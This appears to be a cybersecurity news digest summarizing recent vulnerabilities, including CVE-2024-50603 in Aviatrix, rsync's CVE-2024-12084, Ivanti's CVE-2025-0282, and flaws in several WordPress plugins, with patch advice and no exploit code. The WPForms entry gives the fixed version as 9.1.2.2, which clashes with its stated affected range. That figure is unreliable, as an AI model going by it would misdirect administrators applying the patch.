A critical command injection vulnerability, CVE-2024-50603, in the Aviatrix Network Controller allows unauthenticated remote attackers to execute arbitrary code. This vulnerability, with a CVSS score of 10.0, stems from improper input handling within the Aviatrix Controller’s API. Exploitation could lead to full system compromise, data theft, and network breaches. There are hundreds of publicly exposed Aviatrix Controllers accessible via the Shodan search engine.
A severe vulnerability in the W3 Total Cache plugin for WordPress has been identified, impacting over one million websites. This flaw enables attackers to gain unauthorized access to sensitive data, including metadata on cloud-based apps. The vulnerability, allowing subscriber-level access, poses a substantial risk to WordPress sites using the plugin, potentially exposing user data and compromising site security.
Multiple vulnerabilities have been discovered in rsync, a widely used file transfer program. Six vulnerabilities have been identified, including a critical remote code execution (RCE) vulnerability (CVE-2024-12084) that allows attackers with anonymous read access to an rsync server to execute arbitrary code on the machine. Other vulnerabilities include information leaks and symlink issues. Users are advised to upgrade to rsync version 3.4.0, released on January 14th, to patch these issues and ensure system security. This highlights the importance of timely patching and update process for critical network utilities.
Multiple critical vulnerabilities have been discovered in SimpleHelp remote support software. These flaws include unauthorized file access, privilege escalation, and remote code execution. These vulnerabilities are trivial to exploit, making them a serious risk for both SimpleHelp servers and the client machines that the software is used to manage. Patches are available, and users are advised to upgrade immediately.
Microsoft has analyzed CVE-2024-44243, a macOS vulnerability that allows attackers to bypass System Integrity Protection (SIP) by loading malicious kernel extensions. This can lead to the installation of rootkits, creation of persistent malware, and circumvention of Transparency, Consent, and Control (TCC) mechanisms, enabling further unauthorized operations on affected systems. The discovery of this vulnerability underscores the importance of robust security measures across all platforms and the potential impacts of vulnerabilities in kernel extensions. This research also highlights that Microsoft is actively involved in securing non-windows platforms.
A critical zero-day vulnerability, tracked as CVE-2025-0282, has been discovered in Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. This stack-based buffer overflow allows unauthenticated remote attackers to achieve remote code execution. This is in addition to CVE-2025-0283 which is another stack-based buffer overflow, which requires a local authenticated attacker. This vulnerability is currently being actively exploited in the wild. Organizations are advised to apply the available patches immediately and perform factory resets to ensure complete removal of any potential malware. Ivanti has a long history of being targeted.
Multiple vulnerabilities have been discovered in Palo Alto Networks’ Expedition migration tool, including an OS command injection flaw and a vulnerability that exposes sensitive firewall credentials. These vulnerabilities could allow attackers to execute arbitrary code and access usernames, cleartext passwords, device configurations, and API keys. The vulnerabilities pose a significant risk to organizations using the tool for firewall migration and optimization.
Critical security vulnerabilities have been found in the Fancy Product Designer plugin for WordPress. These unpatched flaws in the plugin allow for system compromise, data exposure, and service disruption. The plugin, with over 20,000 sales, is now a major security risk for WordPress websites. Users must take immediate action to mitigate these vulnerabilities, highlighting the need for thorough security practices on WordPress.
Moxa has identified two critical security vulnerabilities in its cellular routers, secure routers, and network security appliances. The first vulnerability, CVE-2024-9138, involves hard-coded credentials that could allow authenticated users to escalate their privileges to root-level access, enabling system compromise, unauthorized modifications, data exposure, and service disruptions. The second flaw is CVE-2024-9140. Both have a CVSS score of 9.8. Moxa is urging users to apply immediate updates to mitigate these risks.
A high-severity code execution vulnerability has been found in the Nuclei vulnerability scanner due to a bypass in its template signature verification process. The vulnerability allows attackers to inject malicious code using custom templates, potentially leading to compromise of systems using Nuclei. This flaw is due to the use of regular expressions in the verification process along with the YAML parser. It highlights the risks involved in using custom templates in security tools and the need for robust verification mechanisms.
Tenable has disabled two Nessus scanner agent versions (10.8.0 and 10.8.1) after discovering a critical issue where a faulty differential plugin update was causing agents to go offline. This issue impacts the Nessus agents ability to scan for vulnerabilities and collect security data. Tenable has released version 10.8.2 to fix this problem and has provided instructions on how to bring the affected agents back online. This is a critical update for all users of the Tenable Nessus Agent.
A critical vulnerability, identified as CVE-2024-8474, exists in OpenVPN Connect prior to version 3.5.0. This flaw can expose users’ private keys by logging them in clear text within the application logs. Attackers with unauthorized access to these logs could decrypt VPN traffic, thereby compromising user confidentiality. Additionally, a separate vulnerability (CVE-2024-5594) in OpenVPN before 2.6.11 allows malicious peers to inject arbitrary data through improperly sanitized PUSH_REPLY messages, leading to potential exploitation of third-party plugins or executables. Both vulnerabilities pose serious risks to the security of OpenVPN users.
A critical vulnerability, CVE-2024-11205, has been discovered in the WPForms plugin for WordPress, affecting versions 1.8.4 through 1.9.2.1. This vulnerability stems from a missing authorization check in the wpforms_is_admin_page function, allowing attackers with Subscriber-level privileges to perform unauthorized actions such as refunding payments and canceling subscriptions. This flaw has the potential to cause significant financial losses and service disruptions for website owners using the plugin. A fix is available in version 9.1.2.2 or later. Website administrators should review user permissions, enable 2FA, monitor site activity, and back up regularly to mitigate risks. This vulnerability highlights the importance of proactive security measures and staying informed about software updates.